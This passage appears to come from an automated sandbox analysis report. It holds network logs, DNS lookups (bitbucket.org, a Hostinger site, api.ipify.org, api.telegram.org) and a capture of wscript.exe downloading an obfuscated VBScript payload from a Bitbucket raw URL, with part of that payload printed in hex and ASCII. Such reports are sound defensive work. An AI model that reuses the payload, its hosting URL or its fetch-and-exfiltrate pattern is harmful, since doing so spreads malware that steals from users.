                                                                                                                            Nov 6, 2024 17:32:13.921708107 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.921763897 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.921773911 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.921791077 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.921804905 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.985511065 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.985527992 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.985584974 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.985595942 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.985639095 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.042257071 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.042277098 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.042318106 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.042329073 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.042340994 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.042361975 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.308856964 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.308881998 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.308979034 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.308979034 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.309000969 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.309042931 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.309184074 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.309202909 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.309273005 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.309273005 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.309282064 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.309330940 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.309674978 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.309690952 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.309743881 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.309751987 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.309763908 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.309813976 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.317256927 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.317274094 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.317344904 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.317353010 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.317418098 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.338016987 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.338033915 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.338118076 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.338129997 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.338215113 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.396796942 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.396814108 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.397021055 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.397036076 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.397156954 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.454293966 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.454320908 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.454505920 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.454531908 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.454607964 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.513360977 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.513384104 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.513582945 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.513603926 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.513771057 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.571144104 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.571171045 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.571248055 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.571270943 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.571333885 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.571333885 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.627652884 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.627676010 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.627774954 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.627793074 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.627813101 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.627872944 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.631735086 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.631752014 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.631870031 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.631880045 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.632006884 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.689764977 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.689795017 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.689888954 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.689888954 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.689909935 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.690517902 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.747818947 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.747853041 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.747976065 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.747989893 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.748126030 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.805679083 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.805705070 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.805905104 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.805926085 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.806113958 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.858618021 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.858650923 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.858726025 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.858741045 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.858778000 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.859411001 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.865132093 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.865154028 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.865274906 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.865274906 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.865288019 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.865624905 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.923243046 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.923269033 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.923443079 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.923461914 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.923640966 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.978605032 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.978627920 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.978797913 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.978817940 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.979091883 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.982573032 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.982595921 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.982639074 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.982702971 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.982703924 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:14.982702971 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.982892036 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:14.985446930 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:22.902898073 CET49834443192.168.2.9104.26.12.205
                                                                                                                            Nov 6, 2024 17:32:22.902940035 CET44349834104.26.12.205192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:22.903007984 CET49834443192.168.2.9104.26.12.205
                                                                                                                            Nov 6, 2024 17:32:22.906088114 CET49834443192.168.2.9104.26.12.205
                                                                                                                            Nov 6, 2024 17:32:22.906112909 CET44349834104.26.12.205192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:23.565274954 CET44349834104.26.12.205192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:23.565387011 CET49834443192.168.2.9104.26.12.205
                                                                                                                            Nov 6, 2024 17:32:23.570424080 CET49834443192.168.2.9104.26.12.205
                                                                                                                            Nov 6, 2024 17:32:23.570449114 CET44349834104.26.12.205192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:23.570707083 CET44349834104.26.12.205192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:23.571872950 CET49834443192.168.2.9104.26.12.205
                                                                                                                            Nov 6, 2024 17:32:23.619333982 CET44349834104.26.12.205192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:23.762418032 CET44349834104.26.12.205192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:23.762496948 CET44349834104.26.12.205192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:23.762605906 CET49834443192.168.2.9104.26.12.205
                                                                                                                            Nov 6, 2024 17:32:23.764035940 CET49834443192.168.2.9104.26.12.205
                                                                                                                            Nov 6, 2024 17:32:23.850842953 CET49840443192.168.2.9149.154.167.220
                                                                                                                            Nov 6, 2024 17:32:23.850888968 CET44349840149.154.167.220192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:23.850966930 CET49840443192.168.2.9149.154.167.220
                                                                                                                            Nov 6, 2024 17:32:23.851291895 CET49840443192.168.2.9149.154.167.220
                                                                                                                            Nov 6, 2024 17:32:23.851305962 CET44349840149.154.167.220192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:24.698889017 CET44349840149.154.167.220192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:24.698976994 CET49840443192.168.2.9149.154.167.220
                                                                                                                            Nov 6, 2024 17:32:24.701105118 CET49840443192.168.2.9149.154.167.220
                                                                                                                            Nov 6, 2024 17:32:24.701136112 CET44349840149.154.167.220192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:24.701464891 CET44349840149.154.167.220192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:24.702316046 CET49840443192.168.2.9149.154.167.220
                                                                                                                            Nov 6, 2024 17:32:24.747333050 CET44349840149.154.167.220192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:24.747791052 CET49840443192.168.2.9149.154.167.220
                                                                                                                            Nov 6, 2024 17:32:24.747803926 CET44349840149.154.167.220192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:25.011420965 CET44349840149.154.167.220192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:25.056830883 CET49840443192.168.2.9149.154.167.220
                                                                                                                            Nov 6, 2024 17:32:25.056843996 CET44349840149.154.167.220192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:25.060165882 CET49840443192.168.2.9149.154.167.220
                                                                                                                            Nov 6, 2024 17:32:25.060244083 CET44349840149.154.167.220192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:25.060432911 CET49840443192.168.2.9149.154.167.220

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 6, 2024 17:32:00.694988012 CET5223253192.168.2.91.1.1.1
                                                                                                                            Nov 6, 2024 17:32:00.827914000 CET53522321.1.1.1192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:10.507335901 CET6359453192.168.2.91.1.1.1
                                                                                                                            Nov 6, 2024 17:32:10.728818893 CET53635941.1.1.1192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:22.890088081 CET5025653192.168.2.91.1.1.1
                                                                                                                            Nov 6, 2024 17:32:22.897048950 CET53502561.1.1.1192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:23.842299938 CET5740553192.168.2.91.1.1.1
                                                                                                                            Nov 6, 2024 17:32:23.850327969 CET53574051.1.1.1192.168.2.9

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Nov 6, 2024 17:32:00.694988012 CET192.168.2.91.1.1.10x21aStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:10.507335901 CET192.168.2.91.1.1.10xdd44Standard query (0)honeydew-raven-308531.hostingersite.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:22.890088081 CET192.168.2.91.1.1.10x925fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:23.842299938 CET192.168.2.91.1.1.10x946fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Nov 6, 2024 17:31:55.264374018 CET1.1.1.1192.168.2.90x7d53No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:31:55.264374018 CET1.1.1.1192.168.2.90x7d53No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:31:55.264374018 CET1.1.1.1192.168.2.90x7d53No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:00.827914000 CET1.1.1.1192.168.2.90x21aNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:00.827914000 CET1.1.1.1192.168.2.90x21aNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:00.827914000 CET1.1.1.1192.168.2.90x21aNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:10.728818893 CET1.1.1.1192.168.2.90xdd44No error (0)honeydew-raven-308531.hostingersite.comfree.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:10.728818893 CET1.1.1.1192.168.2.90xdd44No error (0)free.cdn.hstgr.net84.32.84.136A (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:22.897048950 CET1.1.1.1192.168.2.90x925fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:22.897048950 CET1.1.1.1192.168.2.90x925fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:22.897048950 CET1.1.1.1192.168.2.90x925fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                            Nov 6, 2024 17:32:23.850327969 CET1.1.1.1192.168.2.90x946fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • bitbucket.org
                                                                                                                            • honeydew-raven-308531.hostingersite.com
                                                                                                                            • api.ipify.org
                                                                                                                            • api.telegram.org

                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.949725185.166.143.494437596C:\Windows\System32\wscript.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-06 16:32:01 UTC351OUTGET /xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010 HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            UA-CPU: AMD64
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: bitbucket.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-06 16:32:02 UTC4181INHTTP/1.1 200 OK
                                                                                                                            Date: Wed, 06 Nov 2024 16:32:02 GMT
                                                                                                                            Content-Type: text/plain
                                                                                                                            Content-Length: 45520
                                                                                                                            Server: AtlassianEdge
                                                                                                                            Last-Modified: Wed, 16 Oct 2024 18:53:15 GMT
                                                                                                                            Etag: "6e0f01bcf58b73419d1fc48dffc2480f"
                                                                                                                            X-Used-Mesh: False
                                                                                                                            Vary: Accept-Language, Origin, Accept-Encoding
                                                                                                                            Content-Language: en
                                                                                                                            X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
                                                                                                                            X-Dc-Location: Micros-3
                                                                                                                            X-Served-By: 710a0180ad81
                                                                                                                            X-Version: 9b0b74ffa9d3
                                                                                                                            X-Static-Version: 9b0b74ffa9d3
                                                                                                                            X-Request-Count: 3730
                                                                                                                            X-Render-Time: 0.04932689666748047
                                                                                                                            X-B3-Traceid: a9ef67eff39e4739b567f011ef15c6e5
                                                                                                                            X-B3-Spanid: b00e3271e6271fe1
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net www.atlassian.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod. [TRUNCATED]
                                                                                                                            X-Usage-Quota-Remaining: 999089.932
                                                                                                                            X-Usage-Request-Cost: 924.50
                                                                                                                            X-Usage-User-Time: 0.023830
                                                                                                                            X-Usage-System-Time: 0.003905
                                                                                                                            X-Usage-Input-Ops: 0
                                                                                                                            X-Usage-Output-Ops: 0
                                                                                                                            Cache-Control: s-maxage=900, max-age=900
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            X-Cache: MISS
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Xss-Protection: 1; mode=block
                                                                                                                            Atl-Traceid: a9ef67eff39e4739b567f011ef15c6e5
                                                                                                                            Atl-Request-Id: a9ef67ef-f39e-4739-b567-f011ef15c6e5
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                            Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=3,atl-edge-upstream;dur=157,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                            Connection: close
                                                                                                                            2024-11-06 16:32:02 UTC12203INData Raw: 44 69 6d 20 73 64 62 73 7a 64 64 75 6e 66 72 6c 77 79 70 61 76 63 75 70 0a 73 64 62 73 7a 64 64 75 6e 66 72 6c 77 79 70 61 76 63 75 70 20 3d 20 22 44 26 2d 2d 2d 2d 2d 26 69 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 6d 5f 5f 5f 5f 25 5f 5f 5f 5f 20 26 2d 2d 2d 2d 2d 26 6a 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 6c 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 6a 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 64 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 6d 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 65 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 77 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 6f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 72 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 67 5f 5f 5f 5f 25 5f 5f 5f 5f
                                                                                                                            Data Ascii: Dim sdbszddunfrlwypavcupsdbszddunfrlwypavcup = "D&-----&i____%____&-----&m____%____ &-----&j____%____&-----&l____%____&-----&j____%____&-----&d____%____&-----&m____%____&-----&e____%____&-----&w____%____&-----&o____%____&-----&r____%____&-----&g____%____
                                                                                                                            2024-11-06 16:32:02 UTC16384INData Raw: 20 3d 20 4e 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 6f 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 74 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 68 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 69 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 6e 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 67 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 22 22 5f 5f 5f 5f 25 5f 5f 5f 5f 20 26 20 5f 22 20 26 20 5f 0a 76 62 43 72 4c 66 20 26 20 22 76 26 2d 2d 2d 2d 2d 26 62 5f 5f 5f 5f 25 5f
                                                                                                                            Data Ascii: = N&-----&&-----&o____%________%____&-----&&-----&t____%________%____&-----&&-----&h____%________%____&-----&&-----&i____%________%____&-----&&-----&n____%________%____&-----&&-----&g____%________%____&-----&""____%____ & _" & _vbCrLf & "v&-----&b____%_
                                                                                                                            2024-11-06 16:32:02 UTC16384INData Raw: 2d 2d 2d 2d 26 34 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 35 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 36 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 34 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 35 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 36 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 52 54 48 4a 54 59 4a 54 59 26 2d 2d 2d 2d 2d 26 26 2d 2d 2d 2d 2d 26 22 22 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 22 22 5f 5f 5f 5f 25 5f 5f 5f 5f 5f 5f 5f 5f 25 5f 5f 5f 5f 2c 20 26 2d 2d
                                                                                                                            Data Ascii: ----&4____%________%____&-----&&-----&5____%________%____&-----&&-----&6____%________%____&-----&&-----&4____%________%____&-----&&-----&5____%________%____&-----&&-----&6____%________%____RTHJTYJTY&-----&&-----&""____%____&-----&""____%________%____, &--
